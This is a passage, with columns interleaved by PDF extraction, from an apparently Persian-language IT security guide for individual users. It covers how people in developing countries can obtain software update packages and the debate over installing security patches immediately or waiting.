‫ﭼﻨﺪ ﺭﺍﻩ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬ ‫‪ ۵۰۰‬ﻛﻴﻠﻮ ﺑﺎﻳﺖ ﺣﺠﻢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ‪ -‬ﻛﻪ ﺍﻧﺪﺍﺯﺓ ﻛﻮﭼﻜﻲ‬
‫ﺑﺮﺍﻱ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ؛‬
‫ﺍﮔﺮ ﺳﺎﺯﻣﺎﻧﻲ ﺩﺍﺭﺍﻱ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﺘﻌﺪﺩ ﺑﺎﺷﺪ‪ ،‬ﺭﺍﻫﺒـﺮ ﻓﻨـﻲ‬ ‫•‬ ‫ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﺍﻳﻦ ﻓﻘﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‬
‫ﺑﺎﻳــﺪ ﻣــﺴﺌﻮﻟﻴﺖ ‪ download‬ﻭ ﻧــﺼﺐ ﺑــﺴﺘﻪﻫــﺎﻱ‬ ‫ﻭﺍﻗﻌﻲ ﺭﺍ ‪ download‬ﻣـﻲﻛﻨـﺪ ﻭ ﺳـﭙﺲ ﺁﻧـﺮﺍ ﻧـﺼﺐ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻧﺮﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﺩ‪.‬‬ ‫ﻣﻲ ﻧﻤﺎﻳﺪ؛ ﻭ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌﻲ ﺷﺎﻳﺪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺩﺭ ﺣﺪﻭﺩ‬
‫ﻛﻠﻮﭘﻬــﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻳــﺎ ﮔﺮﻭﻫﻬــﺎﻱ ﺩﻳﮕــﺮ ﻣــﻲﺗﻮﺍﻧﻨــﺪ‬ ‫•‬ ‫‪ ۳۰‬ﻣﮕﺎ ﺑﺎﻳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ‪ download‬ﻛﻨﻨـﺪ ﻭ ﺁﻧﻬـﺎ ﺭﺍ‬ ‫ﺑﺮﺧﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺍﺭﺍﻱ ﺗﻮﺍﺑﻊ ﺍﺯ ﭘﻴﺶ ﺗﻌﺮﻳـﻒ ﺷـﺪﻩﺍﻱ‬ ‫‪.۳‬‬
‫ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺍﻋﻀﺎ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬ ‫ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺑﻪ ﺑﺮﺭﺳـﻲ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ‬
‫ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ )‪ISP‬ﻫـﺎ(‪ ٣١‬ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬ ‫•‬ ‫ﺍﺭﺍﺋــﻪﺷــﺪﻩ ﻣــﻲﭘﺮﺩﺍﺯﻧــﺪ ﻭ ﺑــﺎ ﺍﺟــﺎﺯﺓ ﻛــﺎﺭﺑﺮ ﺁﻧﻬــﺎ ﺭﺍ‬
‫ﺑـــﺴﺘﻪﻫـــﺎﻱ ﺑـــﻪﺭﻭﺯﺭﺳـــﺎﻧﻲ ﻣﺤـــﺼﻮﻻﺕ ﺭﺍﻳـــﺞ ﻭ‬ ‫‪ download‬ﻭ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎﻱ ﻣـﺸﺘﺮﻙ ﺭﺍ ﺗﻬﻴـﻪ ﻭ ﺑـﺼﻮﺭﺕ ﻣﺤﻠـﻲ‬ ‫ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺮﺍﻱ ﺁﺳﺎﻧﺘﺮ ﺷﺪﻥ ﻛﺎﺭ ﺷﻤﺎ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﻧـﺪ‪ .‬ﺩﺭ‬
‫ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺗﻮﺯﻳـﻊ ﻛﻨﻨـﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﻧﻴﺎﺯﻣﻨـﺪﻱ‬ ‫ﻛﻠﻴﺔ ﻣﻮﺍﺭﺩ ﻭﻇﻴﻔﺔ ﺍﻧﺘﺨﺎﺏ ﺩﻗﻴﻖ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻣـﻮﺭﺩ‬
‫‪ISP‬ﻫﺎ ﺑﻪ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻛـﻢ ﻣـﻲﺷـﻮﺩ ﻭ ﻟـﺬﺍ‬ ‫ﻧﻴﺎﺯ )ﻛﻪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﺎﺹ‪ ،‬ﻛﺎﺭ ﭘﻴﭽﻴﺪﻩﺍﻱ‬
‫ﻫﺰﻳﻨﺔ ﺁﻧﻬﺎ ﻧﻴﺰ ﻛﺎﻫﺶ ﻣﻲﻳﺎﺑﺪ‪.‬‬ ‫ﺍﺳﺖ( ﺑﻮﺳﻴﻠﺔ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‬ ‫•‬
‫ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ‪.‬‬ ‫ﻣﺸﻜﻞ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‬

‫ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۳‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ ﻛـﺮﻡ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺑﺎﻋـﺚ‬ ‫•‬ ‫ﻫﻤــﺎﻧﻄﻮﺭ ﻛــﻪ ﻣــﺸﺎﻫﺪﻩ ﻣــﻲﻛﻨﻴــﺪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ‬
‫ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺭﺍﻳﺎﻧﻪ ﻫﺎ ﺷﺪ‪ ،‬ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ‬ ‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺩﺭ ﻣﺤﻴﻂ ﻣﺘﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻃﺮﺍﺣـﻲ‬
‫ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ ﺍﻗﺪﺍﻡ ﺑـﻪ ﺗﻮﺯﻳـﻊ ﺑـﺴﺘﻪﻫـﺎﻱ‬ ‫ﺷــﺪﻩﺍﻧــﺪ ﻭ ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﭼﻨــﺪﻳﻦ ﻣﮕﺎﺑــﺎﻳﺘﻲ ﺭﺍ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑـﺮ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﺍﻗـﺪﺍﻡ ﻛـﺮﺩ‪.‬‬ ‫‪ download‬ﻣــﻲﻛﻨﻨــﺪ‪ .‬ﻟــﺬﺍ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳــﻦ ﺭﻭﺵ ﺗﻨﻬــﺎ ﺩﺭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﻫﻤﭽﻨﺎﻥ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺩﺍﻣﻪ ﻳﺎﺑﺪ‪.‬‬ ‫ﺻﻮﺭﺗﻲ ﻧﺘﻴﺠﻪﺑﺨﺶ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ ﻛـﻪ ﻳـﻚ ﺍﺭﺗﺒـﺎﻁ ﭘﺮﺳـﺮﻋﺖ‬
‫ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻳـﺎ ﺑﺘﻮﺍﻧﻴـﺪ ﺍﺭﺗﺒـﺎﻁ ﺗﻠﻔﻨـﻲ ﺧـﻮﺩ ﺭﺍ ﺗـﺎ‬
‫ﻫﺮﭼﻨﺪ ﺳﻪ ﺷﻴﻮﺓ ﺍﺧﻴﺮ ﺗﻮﺯﻳﻊ ﺑﺴﺘﻪﻫـﺎﻱ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭼﻨـﺪﺍﻥ‬
‫ﻻ ﺩﺭ ﻛـﺸﻮﺭﻫـﺎﻱ‬ ‫ﭼﻨﺪﻳﻦ ﺳﺎﻋﺖ ﺑﺮﻗﺮﺍﺭ ﻧﮕﻪ ﺩﺍﺭﻳـﺪ‪ .‬ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ‬
‫ﺭﺍﻳﺞ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳـﻚ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻣـﺆﺛﺮ ﺗﺠـﺎﺭﻱ ﺑـﺮﺍﻱ‬
‫‪ISP‬ﻫﺎ ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺗﺒـﺪﻳﻞ‬ ‫ﺩﻭ ﺭﻭﺵ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﻣﺸﻜﻞ ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪:‬‬
‫ﺷﻮﻧﺪ‪ .‬ﺍﮔﺮﭼﻪ ﺍﺯ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺳﺘﻘﺒﺎﻝ ﻣـﻲﺷـﻮﺩ‪،‬‬ ‫ﺍﺯ ﺧﻴــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻧــﺮﻡﺍﻓــﺰﺍﺭﻫــﺎﻱ ﻛــﺎﺭﺑﺮﺩﻱ ﻭ‬ ‫‪.۱‬‬
‫ﺍﻣﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﻛـﻪ ﻣﻨـﺎﺑﻊ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺑﮕﺬﺭﻳﺪ‪.‬‬
‫ﻣﺤﻠﻲ ﻧﻴﺰ ﻗﺎﺑـﻞ ﺍﻃﻤﻴﻨـﺎﻥ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﮔـﺮ ﻣﻨـﺎﺑﻊ ﻣﺤﻠـﻲ ﻗﺎﺑـﻞ‬
‫ﺍﺯ ﻓــﺮﺩ ﺩﻳﮕــﺮﻱ ﺑﺨﻮﺍﻫﻴــﺪ ﺑــﺴﺘﺔ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍ‬ ‫‪.۲‬‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﻧﺒﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻣﺮﻛﺰﻱ ﺑﺮﺍﻱ ﺗﻮﺯﻳﻊ ﻭﻳﺮﻭﺳـﻬﺎ‬
‫‪ download‬ﻛﻨﺪ ﻭ ﺟﺰﺋﻴﺎﺕ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻧﺼﺐ ﺭﺍ ﺍﺭﺍﺋﻪ‬
‫ﻭ ﺗﺮﺍﻭﺍﻫﺎ ﺗﺒﺪﻳﻞ ﺷﻮﻧﺪ‪.‬‬
‫ﺩﻫﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺴﺘﺔ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳـﻖ‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻳﺎ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺗﻮﺯﻳﻊ ﺷﻮﺩ‪.‬‬

‫‪31‬‬ ‫‪Internet Service Providers‬‬


‫‪٦٧‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺑﻘﻴﺔ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ ﻧـﻮﻉ ﻋﻤﻠﻜـﺮﺩ‬ ‫ﺁﻳﺎ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﺎﻳﺪ ﭘـﺲ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ‪،‬‬
‫ﺁﻧﻬﺎ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﻧﻤﺎﻳﻨﺪ‪ .‬ﺗﺄﺧﻴﺮ ﭼﻨﺪ ﻫﻔﺘﻪﺍﻱ ﻳﺎ ﭼﻨﺪ ﻣﺎﻫﻪ‬ ‫ﺳﺮﻳﻌ ﹰﺎ ﻧﺼﺐ ﻧﻤﻮﺩ؟‬
‫ﺩﺭ ﻧﺼﺐ ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺎﺟﺮﺍﺟﻮ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫـﺪ‬
‫ﺍﻳﻦ ﺑﺤﺚ ﭼﻨﺪﻳﻦ ﺩﻫﻪ ﻣﻴﺎﻥ ﻣﺘﺨﺼﺼﺎﻥ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺟﺮﻳﺎﻥ ﺑـﻮﺩﻩ‬
‫ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﻧﺼﺐ ﻛﻨﻨﺪ‪ ،‬ﻣﺸﻜﻼﺕ ﺍﺣﺘﻤﺎﻟﻲ‬
‫ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﻣﺘﻔﺎﻭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺭﺍ ﻛﺸﻒ ﻭ ﮔﺰﺍﺭﺵ ﻧﻤﺎﻳﻨﺪ‪ ،‬ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ ‪ -‬ﭘـﻴﺶ ﺍﺯ ﺍﻳﻨﻜـﻪ‬
‫ﺷﻤﺎ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎ ﺭﺍ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ‪ -‬ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ‬ ‫ﻣﻮﺍﻓﻘﺎﻥ‪ :‬ﺍﮔﺮ ﺳﺮﻳﻌﹰﺎ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ﺭﺍ ﻧـﺼﺐ‬
‫ﻓﺮﺻﺖ ﺍﺻﻼﺡ ﻧﻘﺎﻳﺺ ﺟﺪﻳﺪ ﺭﺍ ﺑﺪﻫﻨﺪ‪.‬‬ ‫ﻛﻨﻴﺪ‪ ،‬ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺁﺳـﻴﺒﻬﺎﻱ ﺷـﻨﺎﺧﺘﻪﺷـﺪﻩ ﺍﻳﻤـﻦ‬
‫ﻛﺮﺩﻩﺍﻳـﺪ‪ .‬ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻤﻨـﻲ ﺣﺎﺻـﻞ ﺍﺯ ﺑـﺴﺘﻪﻫـﺎﻱ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻫﺮﮔﺰ ﻧﻤﻲﺗﻮﺍﻥ ﮔﻔﺖ ﻛﻪ ﺗﻐﻴﻴﺮﺍﺕ ﭼﻪ ﺯﻣـﺎﻧﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﻳـﻚ‬


‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ‪ ،‬ﺗﺎ ﺳـﻄﺤﻲ ﻛـﻪ ﺳﻴـﺴﺘﻢ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ‬
‫ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻛﺎﺭﺑﺮﺩﻱ ﺭﺍ ﺍﺯ ﺭﻭﻧﺪ ﺻﺤﻴﺢ ﺍﺟﺮﺍ ﺧﺎﺭﺝ ﻛﻨﻨﺪ‪ .‬ﺑﻪ ﻫﻤﻴﻦ‬
‫ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺍﺯ ﺧـﻮﺩ ﺩﺭ ﺑﺮﺍﺑـﺮ ﻧﻔـﻮﺫ ﻭ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺩﻟﻴﻞ ﺍﮔﺮ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺩﺭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺣﺴﺎﺱ ﺗﺠـﺎﺭﻱ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﺤﺎﻓﻈﺖ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﻣــﻲﺷــﻮﺩ‪ ،‬ﺑﻬﺘــﺮﻳﻦ ﺭﺍﻫﻜــﺎﺭ ﺍﻳــﻦ ﺍﺳــﺖ ﻛــﻪ ﭘــﻴﺶ ﺍﺯ ﺍﻋﻤــﺎﻝ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﺟﺪﻳﺪ‪ ،‬ﺍﺑﺘـﺪﺍ ﺗﻐﻴﻴـﺮﺍﺕ ﺭﺍ ﺭﻭﻱ ﻳـﻚ ﺩﺳـﺘﮕﺎﻩ‬ ‫ﻣﺨﺎﻟﻔــﺎﻥ‪ :‬ﺍﻣﻜــﺎﻥ ﺩﺍﺭﺩ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ﻫﻨﮕــﺎﻡ‬
‫ﻣﺸﺎﺑﻪ ﻭ ﻧﻪﭼﻨﺪﺍﻥ ﺣﻴﺎﺗﻲ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ‪.‬‬ ‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﺷـﻮﻧﺪ ﻳـﺎ ﺑﺨـﺶ ﺩﻳﮕـﺮﻱ ﺍﺯ‬
‫ﺑﺮﻧﺎﻣــﻪ ﺭﺍ ﻣﺨﺘــﻞ ﻧﻤﺎﻳﻨــﺪ‪ .‬ﻫﻤﭽﻨــﻴﻦ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻏﻴﺮﺳﻨﺘﻲ ﻭ ﻏﻴﺮﺗﺠﺎﺭﻱ‬ ‫ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﺍﺻـﻠﻲ‬
‫ﺩﺭ ﺑﺤﺚ ﻗﺒﻞ ﺑﺮ ﻣﺤﺼﻮﻻﺕ ﺗﺠﺎﺭﻱ ﺷـﺎﻣﻞ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ ﻭ‬ ‫ﺍﺷﻜﺎﻝ ﻭ ﺁﺳﻴﺐﭘـﺬﻳﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻟـﺬﺍ ﺍﻳـﻦ‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻋﻤﺪﻩ ﻣﺘﻤﺮﻛﺰ ﺷـﺪﻳﻢ ﻛـﻪ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ‬ ‫ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﺴﺘﺔ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻣـﺸﻜﻼﺕ‬
‫ﻣﺤﻴﻄﻬﺎﻱ ﻣﺤﺎﺳﺒﺎﺗﻲ ﻣﺮﺳـﻮﻡ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﻣـﺎ ﺩﺭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬ ‫ﺟﺪﻳﺪﻱ ﺭﺍ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻭﺭﺩ ﻛﻪ ﺑﻪ ﻣـﺸﻜﻞ ﻗﺒﻠـﻲ ﺍﺭﺗﺒـﺎﻃﻲ‬
‫ﺩﻳﮕﺮ ﺷﺮﺍﻳﻂ ﭼﻪ ﺗﻐﻴﻴﺮﺍﺗﻲ ﻣﻲﻛﻨﻨﺪ؟‬ ‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺍﻧﺘﺸﺎﺭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻛﺸﻒﺷﺪﻩ ﻛﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻛﻮﭼﻚ‬ ‫ﺁﻧﻬﺎ ﻣﻬﺎﺟﻤﺎﻥ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻧﻔـﻮﺫ ﻛـﺮﺩﻩ ﻭ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ ﺗﺨﺮﻳـﺐ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺑـﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ ﻳـﺎ ﺑـﺎ‬ ‫ﻣﻲﻛﻨﻨﺪ ﺩﺍﻣﻨﺔ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ‬
‫ﺣﺪﺍﻗﻞ ﻫﺰﻳﻨﻪ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪ .‬ﺳـﻄﺢ ﭘـﺸﺘﻴﺒﺎﻧﻲ‬ ‫ﻧﻘﺺ ﺍﻣﻨﻴﺘﻲ ﺍﻋﻼﻡ ﻣﻲﺷﻮﺩ ‪ -‬ﺣﺘﻲ ﺍﮔﺮ ﺍﻳﻦ ﺍﻋﻼﻡ ﺗﻮﺳﻂ ﻳﻚ‬
‫ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺗﻔﺎﻭﺗﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﺩﺍﺭﺩ‪ .‬ﺑﻄﻮﺭ ﻛﻠـﻲ‬ ‫ﻭﺻﻠﺔ ﺍﻣﻨﻴﺘﻲ ﺻﻮﺭﺕ ﭘﺬﻳﺮﺩ ‪ -‬ﻣﻬﺎﺟﻤﺎﻥ ﺳﺮﻳﻌﹰﺎ ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ‬
‫ﺍﺳــﺘﻔﺎﺩﺓ ﻣﺘﻨــﺎﻭﺏ ﺍﺯ ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍﻳﮕــﺎﻥ ﻭ ﻳــﺎ‬ ‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻧﻘﺺ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ‪ ،‬ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﻣﻤﻜﻦ‬
‫ﻻ ﺿﻌﻔﻬﺎﻱ‬ ‫ﻼ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻌﻤﻮ ﹰ‬ ‫ﻛﻢﻫﺰﻳﻨﻪ ﻛﺎﻣ ﹰ‬ ‫ﺍﺳﺖ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﺔ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﺍﺯ ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺘﺸﺮﺷﺪﻩ‬
